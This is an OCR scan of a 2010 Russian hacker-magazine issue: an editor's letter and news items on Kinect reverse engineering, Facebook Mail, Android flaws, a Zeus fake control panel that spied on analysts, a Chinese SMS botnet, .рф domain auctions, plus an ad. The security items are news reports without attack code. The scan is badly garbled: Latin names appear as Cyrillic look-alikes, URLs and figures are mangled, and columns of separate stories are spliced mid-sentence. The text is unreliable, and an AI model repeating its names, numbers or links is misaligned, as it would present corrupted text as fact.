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Писать в новогоднем выпуске журнала прото, как 
круто я желаю тебе встретить Новый год — самая 
банальная идея, какую только можно придумать. 
Ведь именно это сейчас написано в любом журнале, 
начиная сТоІаІ РооіЬаІІ и заканчивая Ѵодие :). 

Поэтому я просто поделюсь с тобой некоторыми 
нашими свежими новостями. 

1. Мы переехали в новый офис на ул. Ленинская 
Слобода, 1 9. А переезд — сам знаешь, штука сложная 
и выявляет массу ненужных вещей. Поэтому я 
решил опять организовать нашу традиционную 
рождественскую раздачу старых номеров. Приезжай 
27 и 28 декабря за старыми выпусками Хакера: мы 
раздаем их совершенно бесплатно. 
Единственноеусловие — перед приездом 
обязательно напиши мне письмо и дождись 
подтверждения, что можно ехать. Это чтобы не 
попасть впросак: мы не торчим в редакции с 7 до 7, 
поэтому о времени лучше договориться заранее :). 
Также имей ввиду, что количество старых номеров 
ограниченотремя коробками, поэтому лучше всего 
приезжать в первый день. 

2. Мы завели себе блогнаХабре: ЬаЬгаЬаЬг.ги/ 

сотрапѵ/хакер/Ыоа/ . Есл и ты зарегистрирован 
там — присоединяйся и следи за нашим блогом: мы 
постим там интересные материалы и общаемся с 
аудиторией. 

Для нас это важное событие, т.к. Хабра долгое 



время была оплотом наивного и стереотипного 
восприятия Хакера какжурнала «для школьников» 

— именнотакое наследство осталось нам отначала 
двухтысячных. Поэтому мы решили ударить в сердце 
хабрасообщества крутыми материалами потеме ИБ 
и доступно показать, что в реальности представляет 
собой сейчас наш журнал. 

Результаты прекрасные: первый же пост со статьей 
Никиты Тараканова набрал +154 и за 3 минуты вышел 
на главную страницу. В будущем мы планируем 
постить по статье раз в неделю, чтобы вовремя 
затыкать хомячков, рассказывающих басни про «іі- 
мурзилку». 

3. Сайтѵѵѵѵѵѵ.хакер.ги, долгое время бывший, по 
сути, отдельным отжурнала новообразованием, 
перешел под контроль редакции, и теперьу нас есть 
громадье планов по его развитию и масштабным 
изменениям. Следи за сайтом и, я надеюсь, к весне 
ты увидишь массу нового. 

4. Наступающий год — год двенадцатилетия 
журнала, а значит, его уже можно возить на 
переднем сидении автомобиля :). Кроме шуток: 
двенадцать летуспеха — для России это очень круто. 

С новым годом! 
пікііогг, гл. редХ 

пікіІогЯгеа [.хакер, ги 

ѵкопІакіе.ги/сІиЫ 0933209 — наша группа ВКонтакте. 
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ОФФЛАЙНОВЫЙ ФАЙЛООБМЕН 

Заокеанские гики придумали себе новое развлечение — оффлайновую файлооб- 
менную Р2Р-сеть. Сетка с говорящим названием БеасІ Бгор представляет собой не 
что иное, как вмурованные в городские стены ІІЗВ-флешки, подключиться к которым 
можетлюбойжелающий. Забава была придумана и реализована в Нью-Йорке, где 
и «замуровали» 5 первых накопителей. Сколько их насчитывается сейчас, сказать 
сложно — известие о БеасІ Огор распространилось по сети со скоростью лесного 
пожара, и к делу подключилось множество людей. Это было совсем не сложно, 
учитывая, что автор идеи — Арам Батролл — выложил в Сеть подробнейшую видео- 
инструкцию по созданию новых«точекдоступа». Найти торчащую из стены флешку в 
Нью-Йорке теперь можно фактически где угодно :). Если посмотреть базу контейне- 
ров на сіеасісігорг.сопп .то найти точки можно во многих городахСШАи Европы. Увы, в 
России таких вотнычекеще нет. Думаем взять в руки шпатель, намешать немного це- 
мента и сделать обШпе-хранилище в нашем кирпичном здании рядом сЯндексом :]. 




> 9 ноября компания Могіііа отпраздновала 6-летие своего браузера 
НгеТох. 86% дохода компании приносит контракт с боодіе. 



ШЕСТ УЖЕ В ПРОДАЖЕ, ШЕСТ УЖЕ ВЗЛОМАН 




Мы неоднократно писали о новой разработке компании Місгозо^, которая 
вначале носила имя Рго]ес1: ЫаЕаІ, а впоследствии была переименована в КіпесЕ 
Устройство предназначено для подключения к игровой приставке с целью обес- 
печения дистанционного управления игровым процессом при помощи движе- 
ния и голосовых команд. Для этого оно оснащено отдельным процессором для 
выполнения функций распознавания, несколькими видеокамерами, сенсором 
глубины и микрофоном. По сути, Кіпесі; — это «контроллер без контроллера»: в 
качестве «джойстика» здесь выступает все тело человека. Продажи устройства 
стартовали 4 ноября 201 0 года для США и Юноября— для Европы. После чего 
компания АсІаІтиіНпсІизІтіез объявила конкурс о создании открытого драйвера 
для КіпесЕа. Устройство подключается кХЬох через ІІЗВ-порт, а значит, протокол 
взаимодействия можно отреверсить. Первому, комуудастся получить РОВ-изоб- 
ражения с параметрами расстояния до объекта камеры девайса, был обещан приз 
в $1000 (сам Кіпесі; сто ит $1 50]. Забавно, что сумма приза увеличилась вдвое, 
послетого как представители Місгозоіі:, узнав про конкурс, объявили о наличии 
серьезной защиты отреверсинга :]. Короче говоря, первый драйвер появился 
уже 1 1 ноября, а сорцы с документацией были выложены на ОКНиЬ . Сейчас 
проект называется ОрепКіпесІ [ ѵѵѵѵѵѵ.орепкіпесЕогд ] и предоставляет бесплатные 
библиотеки для винды, линукса и мака. На основе этого драйвера уже сейчас 
разработано немало интересных проектов. Например, Филипп Роббел из МІТ 
скомпоновал сенсор Кіпесі: с платформой іРоЬоІ: Сгеаіе и собрал управляемого 
бота, который может в и деть окружающее его пространство и подчиняться жестам. 
Но самая крутая фишка, что этот Кіпеі; Возможет создавать красивые и подробные 
30 карты окружающего пространства и посылать их на главный компьютер. Чтобы 
понять возможности сенсоров (включая сенсор глубины] устройства, лучше всего 
посмотреть видео на ѴоиТиЬе’е. 
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Огромная аудитория РасеЬоок, да еще после выхода фильма «Соци- 
альная сеть», способствуетошеломляющему ажиотажу вокруглюбого 
нововведения сервиса. Одно из последних новшеств — объявление о 
запуске почтового сервиса на базе РасеЬоок — вызвало нешуточный пе- 
реполох в Сети. Система со временем будету каждого из 500 миллионов 



пользователей РасеЬоок, но сейчас доступна по приглашениям. И что 
ты думаешь? На аукционе еВау инвайты для РасеЬоок Маіі расходятся 
по цене $500-700 за штуку! Что же такое чудесное там придумали?, — 
спросишьты. Ответим — ничего. Нет, правда, инсайдеры доносят, что 
наблюдают незамысловатый гибрид чата и почты. Главной особеннос- 
тью новой системы сталото, что она объединяет внутреннюю службу 
сообщений социальной сети, 5М5, сообщения из электронной почты 
и беседы из чатов в одном почтовом ящике на базе адреса ШасеЬоок. 
сот. Система будет автоматически перемещать сообщения от«близких 
контактов» в отдельную папку, а сообщения от других пользователей 
будут попадать в папку «другое». Также за счет интеграции (ЖісеѴѴеЬ 
Аррз, прямо на странице РасеЬоок так можно просматривать файлы 
МісгозоЬ: ѴѴогсІ, Ехсеі и РоѵѵегРоіпЕ Революционненько? Вот и мы отом 
же. Впрочем, Цукерберг позиционировал новый сервис какмаксималь- 
но простой, понятный и приносящий «тоге ІТт», так что удивляться не- 
чему. Однако вся сольситуации заключается втом, что, имея за плечами 
500 млн пользователей, среди которых многие ничего кроме РасеЬоок в 
Интернете не знают, компания действительно может составить опреде- 
ленную конкуренцию таким сервисам, какВМаіІотВоодІе или НоіМаіІот 
М ісгозоЫ:. Забавно, что в РасеЬоок планируют задействовать для этого 
сервиса короткий адрес ІЪ. сот, недавно приобретенный у американско- 
го бюро по сельскому хозяйству (Атегісап Рагт Вигеаи] :). 



> 3а последний год в ядре боодіе АпсІгоісІ обнаружили более 350 
программных ошибок. 



ГУВД ПРОТИВ «СЕРЫХ» ТРУБОК 




ГУВД Москвы предложило ввести уголовную 
ответственность за перепрошивку мобиль- 
ныхтелефонов. «Российским законодатель- 
ством ответственность за данное деяние не 
предусмотрена, а компаниям сотовой связи 
безразлично, какой идентификационный 
номер у телефона, подключенного в сеть, - 
главное, что услуги связи оплачены. «На наш 
взгляд, для разрешения данной проблемы 
следует предусмотреть уголовную ответс- 
твенность», — воттакзаявил представитель 
пресс-службы ведомства Сергей Гуляев. От- 
личная, понимаешьли, инициатива. Только 
перепрошивка для большинства людей озна- 
чает обновление софта (Ьгтѵѵаге) телефона, 
а не смену I М Е I - номера , которую имеет ввиду 
ГУВД. Получаем классическое расхождение 
в понятиях. Хотя сама идея по большей части 
правильная. Смена ІМЕІ, кроме как в случае 
кражи телефона (по этому номеру можно лег- 
ко установить нового «владельца» телефона 
и заставить его вернуть девайс], никогда не 
нужна. Но вопрос: какже они собираются 
доказывать факт смены ІМЕІ в каждом конк- 
ретном случае? Для нас это секрет и большая 
тайна. Но это еще не все: законодателями 
предлагается на уровне операторов блокиро- 
вать украденные мобильники, ІМЕІ которых 
попал в специальную базутипа «Украденные 



телефоны». Практика уже реализована в 
некоторых странах мира. 

Конечно, инициатива московской милиции 
по борьбе с воровством телефонов похваль- 
на. Но до конца, как водится, никто схему 
не продумал. Имеем забавную ситуацию: 



получается, в Москве за это будут пресле- 
довать, а в соседней Туле нет? Получаем ни 
разу не работоспособный механизм. Если уж 
и принимать подобный закон, то, конечно же, 
для всей страны. Атакэто жалкая попытка, 
не иначе. 
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Пространственная рама 



- Ѵ-обраэная турбированная шестерка 
адаптивная подвеска. 



- А еще сверхлегкий карбоновый кузов 
и тормоза с четырехпоршневыми 
суппортами. 



смартфон Затзипд 

ѴѴаѵе 525 



Умных становится больше! Благодаря новому смартфону 
Затзипд ѴѴаѵе 525 с открытой мобильной платформой Васіа 
и множеством полезных приложений. 



ІпІегпеТ Быстрый поиск нужной информации. 

Затзипд Аррз. Приложения на все случаи жизни. 

ЗосіаІ НиЬ. Интеграция социальных сетей для общения с друзьями и коллегами. 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), ѵѵѵѵѵѵ.затзипд.сот. 
Товар сертифицирован. Реклама. 
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МЕ6АЫЕѴѴ5 



ДЫРКИ И ПАТЧИ ДЛЯ ЛИПКОЮ 



Сразу несколько исследователей в области компьютерной безопасности не сговариваясь про- 
демонстрировали уязвимости, найденные в платформе Апбгоіб. Одну дыру показали на конфе- 
ренции Віаск Наі, вторую — на конференции Іпіеі. Обе они позволяютустановить вредоносное 
ПО на смартфон в обход запрета пользователя. В первом случае было показано какэксплой- 
тировать телефон НТО с АпбгоісІ «на борту». Проделывается это через компоненты браузера, 
которые обновляются без предупреждения юзера. Во втором случае продемонстрировали 
как ргооб-об-сопсері; приложение из боодіе Магкеі (аддон кигре Апдгу Вігсіз] инсталлируете 
фоновом режиметри опасныхутилиты: для кражи денег, кражи контактов и трекер местопо- 
ложения. Еще ряд дырок в «Андройде» нашли чуть ранее специалисты компании Аіегі І_одіс 
(интересно, что для этого им пришлось всего-навсего покопаться в старых уязвимостях ѴѴеЬкіІ;). 
Для одной из обнаруженных ими уязвимостей еще и эксплойт прилагается: ѵѵѵѵѵѵ.ехрІоіІ-сІЬ. 
сот/ехріоііз/і 5423 . По идее, этотбагуже исправлен, но, увы, не до конца. Дыру пофиксили 
только для АпбгоісІ 2.2, который используют пока всего 36%устройств. Все вышеописанное, по 
мнению исследователей, ставит ребром вопрос о необходимости улучшенной системы патчей 
для АпбгоісІ 03. Ведь на одном только исправлении багов в последних версиях ОС далеко не 
уедешь, а Ооодіе, в основном, придерживается именнотакой политики. Не помешал бы еще 
и болеежесткий контроль приложений в Ооодіе Магкеі, а также закрытие дыр в АпбгоісІ ниже 
версии 2.2, но здесь против «Андройда» и грает уже тот фа кт, что ОС и устройства разрабатыва- 
ются разными компаниями. 




ОШИБКА В 60061-Е МАРЗ = МЕЖДУНАРОДНЫЙ СКАНДАЛ 




Курьезный и вместе с тем жутковатый случай 
произошел этой осенью на границе Ника- 
рагуа и Коста-Рики. Началось все стого, что 



подразделение армии Никарагуа построило 
близ побережья Карибского моря несколько 
временных лагерей, водрузило внихсвой 
флаг, вырубило деревья в местном заповед- 
номмассивеипровелоеще целый ряд «хо- 
зяйственных работ». И все бы ничего, мало 
ли зачем все это потребовалось военным, 
только вот, оказалось, что они хозяйничали 
неусебядома.а вторглись на пригранич- 
ную территорию Коста-Рики. И вырубили 
они чужой заповедный лес. Причиной этих 
безобразий стал... сервис Ооодіе Марз. 

Как выяснилось, командир подразделения 
руководствовался «Гугл-картами», в которых 
по какой-то причине была допущена ошибка 



— линия границы между странами была 
обозначена неверно. Президент Коста-Рики 
Лаура Чинчилья (между прочим, у этого кро- 
хотного государства даже нет собственной 
армии) выступила по национальному теле- 
видению, резко осуждая это «вторжение». В 
Соодіе, в свою очередь, пожали плечами и 
быстро исправили досадную ошибку. Кстати, 
это не первый инциденттакого рода: в 2007 
году британские солдаты, сопровождавшие 
торговое судно, из-за ошибки СР5 вторглись 
в территориальные воды Ирана. Мораль: 
не стоит слепо доверять сетевым источни- 
кам информации, будьто Соодіе Марз или 
ѴѴікіресІіа. 



> $куре установил рекорд по количеству пользователей, сообщается в 
блоге компании. 22 ноября сервисом одновременно воспользовались 
25 миллионов человек. Всего в базе - более 560 миллионов юзеров. 



«ВКОНТАКТЕ» ЗАМЕТИЛИ КОПИРАСТЫ 



Рассказывая о наших борцах с контрафактом и 
порнографией в Сети, мы неоднократно шутили: 
«Ой, только не показывайте им «ВКонтакте», им 
же станет плохо!». Кто бы мог подумать, что до 
«В Контакте» действительно дойдет очередь, 
да еще и неу наших копирастов, а у западных. В 
списоксайтов с нелегальным контентом нашу 
социальную сеть занесла Американская ассоци- 



ация звукозаписи (РІАА) — объект ненависти и 
лучей поноса со стороны всех борцов за свободу 
информации в Сети. Российский аналог РасеЬоок 
ужаснул РІАА, ведьтуда можно нетолько заливать 
видео- и аудиоматериалы без согласия право- 
обладателей, но и скачивать музыку с помощью 
нехитрых программ! Таким образом «ВКонтакте» 
попал в черный список РІАА наряду ста кими 



ресурсами какТбе Рігаіе Вау, Тоггепі;^, ОетопоісІ 
и Рарісізбаге. Справедливости ради заметим, что 
«ВКонтакте» сейчас активно работает над сокра- 
щением нелегального контента на своих страни- 
цах. Например, недавно была заключена сделка 
стелеканалом ТНТ, который скоро официально 
и легально будет выкладывать свои передачи в 
популярной социальной сети. 
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2ЕІІ5 НАБЛЮДАЕТ ЗА АНАЛИТИКАМИ 



Ботнеты, построенные на основе инструментария 
2еи5, плодятся в Сети, как грибы после дождя. 
Эксперты по информационной безопасности со 
всего мира изучают различные модификации 
трояна, разрабатывая новые способы защиты от 
него, а власти ловятхозяев зомби-сетей, но не 
могутнайти авторов оригинального«Зевса» и его 
многочисленных модификаций. Какоказалось, 
этот пристальный интерес находиту создателей 
2еи5 отклик— им тоже интересно, что творится 
«поту сторону баррикад». Недавно в СШАбыла 
проведена атака на ряд компаний, заплативших 
федеральные налоги. Бизнесменам пришли 
письма якобы отлица налоговой службы США. 

В этих мэйлах сообщалось, что их платежи были 



ИСТЕРИЯ.РФ 




Врядли кто-то еще не слышал отом, что 1 1 ноября 
стартовала свободная регистрация доменов в зоне 
.рф, ведь об этом говорили по ТВ, писали в газетах 
и передавали по радио. Открытие регистрации 
спровоцировало форменную истерию— только 
за первые сутки было куплено 240 тысяч доменов, 
а сайты половины регистраторов периодически 
падали от наплыва посетителей. Сомнительная 
целесообразность существования этой зоны не 



отклонены, итеперь необходимо пройти поука- 
занной ссылке для исправления ситуации. Как 
ты понимаешь, по ссылке расположилась совсем 
не налоговая служба, а рассадник малвари, кото- 
рый, используя уязвимости браузера и плагинов 
(МБАС, АбоЬе Веабег, ѴѴіпсІоѵѵз Неір Сепѣег, Эаѵа), 
заражал компьютеры юзеровтроянцем 2еи5. 
Казалось бы, обычная схема, нетакли?Также 
подумали и специалисты по информационной 
безопасности, когда принялись изучать последс- 
твия атаки. Каковоже было ихудивление, когда 
они обнаружили, что киберпреступники изрядно 
наследили — нашлась, ни много ни мало, панель 
администрирования 2еи5-ботнетом. На первый 
взгляд все выглядело как надо: парольная 



помешала господам из Координационного центра 
и компаний-регистраторов поднять кучу денег на 
продаже воздуха: и речьздесь идет нетолько о 
тех~90 рублях, которые зарабатывает на каждом 
домене Координационный центр. На самом деле, 
основная масса «красивых» доменов была рас- 
продана еще до открытия свободной регистрации: 
по специальным процедурам, добросовестность 
которых вызывает большие сомнения. Так, 
«Потребительское общество рекреации «Наше 
озеро» (сокращенно: ПОРНО] зарегистрировало 
себе домен порно. рф, а Открытая независимая 
логистическая ассоциация «Йота Н» (сокращенно: 
ОНЛАЙН] — онлайн. рф. Эти фиктивные говно- 
конторы были созданы с единственной целью: 
регистрация и перепродажа домена. Учитывая, что 
домены былиуспешнозарегистрированы, сложно 
поверить в бескорыстность действий регистрато- 
ров. За первые сутки открытой регистрации 49.5% 
отобщего числа в 294.000 доменов достались 
Ви-Сепіег. Столь массовую скупку имен регист- 
ратор мотивировалтем, что в периодзакрытой 
регистрации на некоторые домены было подано 
более одной заявки, итеперь нужно проводить 
аукционы между страждущими. Впрочем, именно 



защита, а за ней скрывались статистика рас- 
пространения вредоносного кода, возможность 
загрузить собственную программу для распро- 
странения через ботнет и т.д. Только вот при 
детальном изучении оказалось, что никакого 
ботнета нет вообще, а панель — чистый фэйк. 
Вместо работы эта «липа» лишь имитировала 
бурную деятельность, а на самом деле следила 
за каждым шагом аналитиков, фиксировала все 
ихдействия и переправляла собранную инфор- 
мациюсвоим разработчикам. Таким образом 
хитрые вирусмейкеры получили подробную 
картину действ ий специалистов по выявлению 
систем управления ботнетом и в будущем явно 
сделают из этого соответствующие выводы. 



механизм проведения аукционов и вызвал основ- 
ные вопросы. Так, традиционной стала схема, при 
которой в торгах внезапно начинаетучаствовать 
странный анонимный участник, доводящий ставки 
до десятков тысяч долларов США и заставляю- 
щий реальныхучастниковторгов перебивать эти 
завышенные ставки. В итоге «странный»участник 
сливается прямо передокончанием аукциона и ос- 
тается победитель: реальный человек, купивший 
доменза нереальные бабки. Постранным прави- 
лам аукциона у Ри-Сепіег, ему придется реально 
выплатить эти деньги, чтобы завладетьдоменом, 
хотя логичнее было бы руководствоваться обще- 
мировой практикой, при которой учитываются 
только ставки, дожившие до окончания торгов. 

В итоге по рунету поползло негодование, которое 
было неожиданно поддержано Федеральной 
антимонопольной службой. По состоянию на 19 
ноября в ФАС поступило 14заявлений отфизи- 
ческих и юридическихлиц. ФАС тоже усмотрела в 
поведении регистраторов что-то подозрительно 
похожее на мошенничество и возбудила против 
шестикомпаний дел о . Что из это го в ы й дет (если 
выйдет] скороузнаем. Мыже со своей стороны 
можем сказатьтолько одно — цирк. 



ЗАРПЛАТЫ КРЕМНИЕВОЙ ДОЛИНЫ 

Результаты интересного исследования опубликовали аналитики известного западного портала о работе 
діаззсіоогсот. Там сделали то, что считается неприличным — заглянули в чужой карман и посчитали деньги 
западных ІТ-шников,а если точнее, зарплаты инженеров-программистов (ЭоіФл/аге Епдіпеег]. Выясни- 
лось, что самые высокие зарплаты своим сотрудникам выплачивает компания РасеЬоок — в среднем здесь 
получают$1 10 500 в год, плюс $1 1 900 бонусов. Далее идут компании Сізсо со средней зарплатой в $105 720 и 
бонусами в размере $8529 и компания Ѵабоо — $101 638 зарплаты и $6 197 премиальных. Да, какни странно, 
мастодонты вроде Арріе, МісгозоО: и Ооодіе остались позади. Средняя зарплата программеров «яблочной» 
компании составляет$99 127 в год, в Соодіе платят почти столько же — $98814 (зато бонусы самые большие 
во всем рейтинге: $21 364]. МісгозоО: в списке вообще отсутствует. В этой связи особенно интересно воспри- 
нимается новость, недавно пришедшая из стана «Корпорации Добра». Эрик Шмидт, председатель совета 
директоров и СЕО Соодіе, сообщил, что в будущем году заработная плата всех сотрудников компании (а это 
более 20 000 человек] будет увеличена на 10%, а также все они получат премию в размере $1000. Очевид- 
но, что Ооодіе всеми силами хочет сохранить статус «работы мечты» и при оста но вить отток кадров в тот же 
самый ЕасеЬоок. 
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МЕ6АЫЕѴѴ5 



МОБИЛЬНЫЙ БОТНЕТ В КИТАЕ 




В Поднебесной зарегистрирована одна из 
самых масштабных и быстрых мобильных 
эпидемий последнего времени — более 
миллиона зараженных смартфонов за не- 
сколько суток! Изначально троян, получив- 
ший имя АѴК.Оитх.АТго]ап, маскировался 
то ли под антивирус (это одна из наиболее 
популярных на сегодня схем], то ли под 
медиаплеер. Во мнениях по этому вопросу 
специалисты пока расходятся, и подробнос- 
ти относительно «заразы» не разглашаются, 
такчто, возможно, верны оба варианта. Как 
бы то ни было, сейчас трой продолжает рас- 
пространяться дальше и ежедневно наносит 
пользователям ущерб в размере $300 000, 
рассылая 5М5 на платные номера. Извест- 
но, что малварь очень неплохо справляется 
с обходом реальных антивирусных прило- 
жений — ничуть не хуже своих «старших 
братьев», поражающих обычные компьюте- 
ры. Когда очередной смартфон инфициро- 
ван, вирус рассылает по всему контакт-листу 



5М5-сообщения со ссылками на себя 
любимого и другую малварь, а помимо этого 
сливает все доступные приватные данные 
отелефоне (номер и модель аппарата, 
информация из адресной книги и так далее] 
своим хозяевам на удаленный сервер. Оз- 
наченный сервер уже изучают власти Китая, 
однако не исключено, что собранная виру- 
сом информация давно утекла «куда надо». 
Получается неплохой такой мобильный 
ботнет. Авторы трояна в любой момент могут 
заставить зараженный смартфон послать 
5М5 на платный номер или использовать 
аппарат для очередной спам-рассылки. 
Побороть заразу до конца властям, мобиль- 
ным операторам и экспертам в области 
ІТ-безопасности пока не удается в силу того, 
что вирь довольно часто обновляется, а 
китайские граждане, получив сообщение со 
ссылкой, почему-то считают своим долгом 
по этой ссылке пройти. Ничего, скоро всему 
научатся. 



> Компания ШТесІіз сообщает, что за прошедший год самыми 

популярными языками программирования, выполняемыми на стороне 
сервера, были: РНР - 74.9%, А5РЖТ - 23.8% и ^ѵа - 3.9%. 



СЕКРЕТНЫЙ РЕЖИМ ОТЛАДКИ В ПР0ЦАХ АМР 



Хакер, скрывающийся под ником СіегпоЬуІ, 
сумел взбудоражить весь Инет, выложив в Сеть 
информацию о своей «находке». А обнаружил 
СгегпоЬуІ скрытый режим отладки, зашитый в 
процессоры компании АМ О (начиная с АіЫоп 
ХР] и позволяющий выйти за рамки архитекту- 
ры х86. Информацию отом, как активировать 
недокументированные отладочные механиз- 
мы, он опубликовал на сайте ѵѵѵѵѵѵ.ѵѵоосітапп. 
сот (и сайт тутже лег, не выдержав наплыва 
интересующихся]. Хакер честно заявил, что его 
«исследование» пока далеко отзавершения, 
однако уже функционирует, и на свой страх и 
риск можно попробовать. По сути, добрать- 
ся до отладочного модуля пока можно лишь 
проставив определенныезначения в регист- 
рах процессора и проведя ряд «шаманских» 
манипуляций. Восстановление самих функций 
инструментария пока происходит методом 
тыка. Представители АМО выступили сзаяв- 
лением, сообщив, что находка хакера никогда 
не была «секретной» и предназначалась 
для заводских испытаний, при этом никакой 
угрозы безопасности тоже нет, потому как 
открывшиеся «новые возможности» ничего не 



дадут реверсерам. Правда ли это, пока сказать 
сложно — СгегпоЬуІ раскопал лишь верхушку 
айсберга, который теперь кинулись изучать 
тысячи человексо всего мира. Сумеютли они 



найти что-нибудь полезное, какуже нашли 
реализуемые на аппаратном уровне условные 
точки останова программы в зависимости от 
содержимого данных, скоро узнаем. 




► 010 
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ЦВЕТНЫЕ ЭЛЕКТРОННЫЕ ЧЕРНИЛА 

Уже несколько лет кряду на различных выставках и конфе- 
ренциях публике демонстрируют прототипы Е-Іпк ридеров с 
цветным дисплеем. Однако до последнего времени та киеуст- 
ройства оставались концептами — производители не спешили 
делать ставку на цветные электронные чернила. Теперь этой 
несправедливости пришел конец. Компания Е Іпкофициально 
представила технологию Е ІпкТгііоп, способную отображать 
4096 цветов вместо обычных 1 6 градаций серого. Конечно, это 
не идет ни в какое сравнение с современными ЖК-дисплеями, 
где цветов миллионы, но подожди скептически ухмыляться. Все 
основные плюсы электронных чернил у Тгііоп по-прежнему на 
месте: энергия расходуется только при смене изображения, что 
га ра нти рует устройству дол гую «жиз н ь» (н ескол ько н едел ь от 
одного заряда аккумулятора]. Нетянет видео? Зато прекрасно 
выглядит даже при ярком солнечном свете. Ктомуже новые 
дисплеи на 20% быстрее дисплеев Реагі, использующихся в 
последних версиях электронных книг КіпсІІе и КіпсІІе йХ. По 
сути.Тгііоп являет собой обычный черно-белый дисплей с 
наложенным цветофильтром. Первым девайсом с новинкой 
«на борту», судя по всему, станет ридер от компании Напѵоп 
Тесбпоіоду. Этим ребятам принадлежит почти 80% китайского 
рынка электронных книг. Обустройстве пока известно лишьто, 
что оно будет укомплектован о 9.68-дюймовым сенсорным экра- 
ном (800x600) и модулями ѴѴі-ЕІ и 30, а его стоимость в родном 
Китае составит примерно $440. Вслед за Е Іпксвою цветную 
электронную бумагу показала и компания ЕО Оізріау. 




#Е ШК 






птТргУІ 19/7*5тс- сх 1 1 1 Ш'ЩШііЗ 



^ІШтЬііііІаіІи^бо и г$ сГЕІедапсеІ -Ч 



ИаоСЬэСРѲбСакЭ (З^ООйСШСоХЮ 



> По объему трафика компания Воодіе догоняет магистральных 
операторов Тіег 1. Еще в январе 2010 «Гуглу» принадлежало 5% 
общемирового трафа, а сейчас этот показатель достигуже 6.4%. Общий 
трафик Воодіе за это время вырос почти на 00%. 



БЕЛЫЙ ІРНОИЕ - РЕДКИЙ ВИД 




Ни многони мало $40 000 заработал 17-летний житель Нью-Йорка поиме- 
ни Фей Лам, продавая запчасти для іРЬопе4. Нет, погоди обвинять беднягу 
в страшных грехах, все запчасти легальны. Судя по их виду и качеству, 
можно предположить, что они вообще официальные — изготовленные для 
Арріе. В чем прикол? В том, что все запчасти белого цвета — передняя и 
задняя панели со всеми кнопками и модулями. Официально белые іРЬопе 
4до сих пор не продают, и причина этой странности неизвестна. Лам не 
разглашает, где достает недошедшие до потребительского рынка ком- 
поненты, лишь говорит, что сумел выйти на неких людей из Рохсопп. Этот 
маленький бизнес предприимчивый парень открыл только этим летом, и 
на данный моментобщая выручка предприятия составила уже $130 тыс. 
Полный комплект включает в себя переднюю и заднюю панели со всеми 
модулями, кнопку Ноте, инструменты для самостоятельной «перекрас- 
ки» аппарата, чехол и пленку на экран. Заплатить за это добро придется 
немало — $279. Есть и более бюджетное предложение, можно приобрести 
только переднюю панель за $169. Если такие цены тебя не пугают, вот 
адрес: \ллллл/.\л/ЫіеірЬопе4по\л/.сот . 
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МЕ6АЫЕѴѴ5 



> Согласно исследованию компании Вгоир-ІВ, ежегодно в руки 

российских киберпреступников попадает порядка 20% общемирового 
дохода от киберпреступлений. Выходит, за прошедший год наши 
хакеры «заработали» около $1 млрд. 



ісо выходит на тропу войны 



В апреле этого года компания 
АОІ_ продала столь любимый 
российскими пользователями 
мессенджер ІСО российскому 
инвестиционному фонду О ід іТа I 
5ку Тесбпоіодіез (ЭВТ], он же 
«Маіі.ги Огоир», за $187.5 млн. О 
том, что будет происходить с ІСО 
дальше, можно было догадаться 
на примере Маіі.ги и «Одно- 
классников», которые также 
находятся под управлением ЭЗТ. 
Признаемся, мы с самого апреля ждали, когда новые хозяева «Аськи» 
заявятосебе и начнут портить жизнь альтернативным ІСО-клиентам 
и пользователям. И вот — свершилось. Первый тревожный сигнал 



поступил из блога разработчиков клиента ІЧітЬигг. По сути, новые вла- 
дельцы ІСО поставили перед ІЧітЬигг ультиматум: либо подписывайте 
соглашение и платите деньги за каждого ісц- пользователя в вашем 
клиенте, либо никакой «Аськи». В итоге бесплатный ЫітЬигг был вы- 
нужден отказаться от поддержки протокола 05САР (ІСО). Определенно, 
очередь скоро дойдет и до 01 Р, П&О, Мігапба ІМ и других популярных 
альтернатив. К тому же вполне вероятно, что у «Маіі.ги Сгоир» имеются 
планы по слияниюІСОс «МаіІ.Ри. Агентом». Одним словом, ничего 
хорошего ждать не приходится. Устанавливать родной ІСО-клиент и 
любоваться на рекламу и предложения «пошли 5М5 на короткий номер 
666 и цветочектвоей ІСО станет серо-буро-малиновым», которые явно 
не заставят себя ждать, тоже не вариант. Но и сетовать тут нечего: это 
не наш протокол, это собственность компании. Так что, похоже, выход 
один. У нас в команде уже давно все пользуются ЗаЬЬег’ом, чего и тебе 
советуем. 




> Операционная система ѴѴіпіІоѵѵз 8 для персональных компьютеров 
будет разрабатываться ещё примерно два года и выйдет в конце 2012, 
сообщает блог корпорации МісгозоН. 



МОБИЛЬНЫЙ 



В РОЯМ 
БАНКО 
КАРТЫ 



вской 




В продвинутых восточных странах уже никого 
неудивишьтем, что проезд на метро, автобусе 
и другом общественном транспорте можно 
оплатить при помощи мобильного телефона. 
Все тем же мобильником можно воспользовать- 
ся и для оплаты мелких покупок. На Западе же, 
где традиционно распространены пластиковые 
карты, такой подход пока не нашел большого 
распространения. Атам, где есть пустая ниша, 
в Штатах быстро появляется тот, кто хочет ее 
заполнить. Всего год назад начал свою работу 
многообещающий стартап, а уже сегодня ру- 
ководство объявляето привлечении $28 млн. 
венчурных инвестиций. Компания предлагает 
удобную схему для оплаты товаров с помощью 
любого мобильного телефона, вообще без 
установки специального софта или аппарат- 
ного модуля (какэто происходите случае с 
технологией ІМРС- ЫеагРіеЫ Соттипісаііоп]. 
На сотовый телефон наклеивается микрочип- 
наклейка ВІіпдТад, использующая радиочас- 
тотную идентификацию (РРЮ). Для того .чтобы 
оплатить счет в кафе или покупку в магазине, 
телефон необходимо поднести кспециаль- 
номутерминалу, который запросит пинкод и 
спишет суммы через платежную систему РауРаІ 



(например, с привязанной к аккаунту пласти- 
ковой карты]. Затем система отправитЗМЗо 
проведении платежа на номер покупателя. Это 
удобно и для покупателей, привыкших к РауРаІ и 
пластиковым картам, и для продавцов, которым 
необходимо л ишь установить специальный 
терминал Вііпд ІМаІіоп. Стоимость комплекта 
со всем необходимым для владельцев бизнеса 
не превышает$100, а цена за обслуживание 
начинается с 49 долларов. В масштабах даже 
небольшого бизнеса это ерунда. Кстати, услуга 
впервые была запущена в прошлом году в офис- 
ном кафе компании еВау — владельца системы 
РауРаІ. За ним последовали другие заведения 
Кремниевой долины иторговыеточки в неко- 
торыхуниверситетских кампусах США. Сейчас 
ВІіпдТад используютуже более 20 000 человек, 
и каждую неделю пользователей становится 
больше на несколько тысяч. Как ожидается, 
количество пользователей и заведений, где 
будет работать Вііпд ІЧаІіоп, скоро начнет расти 
лавинообразно. Особенно если сер в и су удастся 
договориться с производителями мобильных 
